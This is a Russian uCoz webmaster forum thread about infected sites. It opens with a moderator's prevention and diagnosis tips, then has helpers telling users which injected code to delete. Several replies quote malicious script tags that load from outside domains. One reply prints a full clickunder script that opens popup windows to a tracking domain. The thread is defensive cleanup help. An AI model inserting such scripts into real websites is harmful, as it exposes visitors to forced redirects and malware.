Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 31 | 16:14:52
    gserg, в панели управления в админ баре есть слово помощь. нажмите. есть бесплатная и платная. выбирайте и пишите

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Vera5543
    Сообщений: 8
    Репутация: 7

    Сообщение # 32 | 20:52:03
    Не успела позавчера удалить вредоносный код из шаблона, вот сегодня опять sad Изучила всю информацию по безопасности на форуме, заменила пароль входа в ПУ. Не знаю, что и делать. Помогите, пожалуйста... Сейчас в шаблонах вроде ничего не вижу. А на всех страницах табличка

    Адрес сайта: http://svetputi.ucoz.ru/
    Прикрепления: 4545730.png (9.3 Kb)
    Harkon
    Сообщений: 27
    Репутация: 2

    Сообщение # 33 | 21:16:29
    У меня никаких вирусов не выбивает! может ето у вас на компютере вирусы? Рекламу советую убрать, если вы ее поставили!


    P.S. я заходил на сайт с Mozilla Firefox )
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 34 | 21:17:13
    Vera5543, причем тут пароль от пу. я уже раз десять писала, что менять надо пароль uid профиля, которым администрируете сайт

    из блока проверь себя удалите скрипт

    Код
    <script type="text/javascript" charset="windows-1251" src="http://resembled-vmammal.in/a/30751374-svetputi.ucoz.ru.js"></script>


    и старайтесь больше не засорять сайт скриптами, тем более настолько бесполезными. после удаления отпишитесь перестал ли ваш касперский ругаться

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Vera5543
    Сообщений: 8
    Репутация: 7

    Сообщение # 35 | 21:42:16
    Harkon, никакой рекламы я не ставила. На компьютере вирусов нет
    А что это за кусок кода в редакторе страниц? <script src="/jquery.js"></script>

    Добавлено (19 Май 2013, 21:42:16)
    ---------------------------------------------
    webanet, большое спасибо! Всё получилось. Теперь нужно поменять пароль, а как из вебтопа?

    Harkon
    Сообщений: 27
    Репутация: 2

    Сообщение # 36 | 21:43:45
    безопасность > сменить пароль акаунта
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 37 | 21:44:27
    Vera5543, из вебтопа. сменить пароль uid профиля

    Цитата
    А что это за кусок кода в редакторе страниц? <script src="/jquery.js"></script>
    это пустой битый скрипт. можете смело удалить

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    zuzikisa
    Сообщений: 26
    Репутация: 2

    Сообщение # 38 | 21:47:44
    что то случилось с сайтом....пропало меню , возможность редактирования и входа в админ панель
    http://hrithikroshan-best.ru/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 39 | 21:56:04
    zuzikisa, панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляем скрипт

    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    - поле на что заменить оставляете пустым и производите замену во всех модулях

    далее тоже самое делаете с кодом

    Код
    <script language="javascript" src="./js.php?s=54"></script>


    после очистки обязательно меняем uid пароль

    с остальным вопросами сюда //forum.ucoz.ru/forum/31

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Vera5543
    Сообщений: 8
    Репутация: 7

    Сообщение # 40 | 22:41:45
    [b]webanet, огромнейшее спасибо[/b] за помощь, uid пароль поменяла. Надеюсь, что больше никто не сможет вносить изменения на сайте.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 41 | 23:23:38
    zuzikisa, все тут //forum.ucoz.ru/forum/31-52166-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    A_L_E_X_007
    Сообщений: 1
    Репутация: 0

    Сообщение # 42 | 14:39:16
    Всем привет. У меня на сайте cerver.clan.su были обнаружены вирусы. Откуда они и как от них избавиться? В день как комп начал визжать, я ничего не добавлял. Help me!
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 43 | 14:51:00
    A_L_E_X_007, очередной сайт-свалка. собран весь интернет.
    Удали в блоке "Статистика"
    Код
    <script src="http://jlsb.ru/color.js" type="text/javascript"></script>

    он там 2 раза прописан. содержит фрейм
    Deus_EX
    Сообщений: 39
    Репутация: 1

    Сообщение # 44 | 11:01:46
    http://www.ls-mods.ru Все перебрал не понятно откуда кликандер прошу помощи
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 45 | 11:42:18
    Deus_EX, самый верх кода шаблонов

    Код
    <script language="javascript" type="text/javascript"> js1911=0; function event1911() { document.onmouseup=click1911; document.onclick=click1911; document.onmouseover=event19112; } function event19112() { document.onmousedown=event1911; } var fu1911=setTimeout("event1911()",100); document.onmouseover=event19112; document.onmousedown=event1911; rref1911=document.referrer; rref1911=unescape(rref1911); event1911(); window.onload=event1911(); function click1911() { js1911=js1911+1; if(js1911<2) { t1911c = GetCookie1911('nl252287O1911'); if (t1911c == null) { pc1911(); } } } function pc1911() { day = new Date(); u608 = "http://" + Math.floor((Math.random()*100000)+1) + ".gotostat.ru/go.php?id=252287&rref=" + rref1911; id = day.getTime(); eval("page" + id + " = window.open(u608, '" + id + "', 'toolbar=1,scrollbars=1,statusbar=1,menubar=1,resizable=1,,,,');"); window.focus(); pathname = "/"; myDomain = "/"; var largeExpDate = new Date (); largeExpDate.setTime(largeExpDate.getTime() + (8 * 60 * 60 * 1000)); var largeExpDate2 = new Date (); largeExpDate2.setTime(largeExpDate2.getTime() + (24 * 60 * 60 * 1000)); SetCookie1911('nl252287O1911','1',largeExpDate, "/"); } function GetCookie1911Val (offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie1911 (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookie1911Val (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie1911 (name, value) { var argv = SetCookie1911.arguments; var argc = SetCookie1911.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); } </script>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Поиск: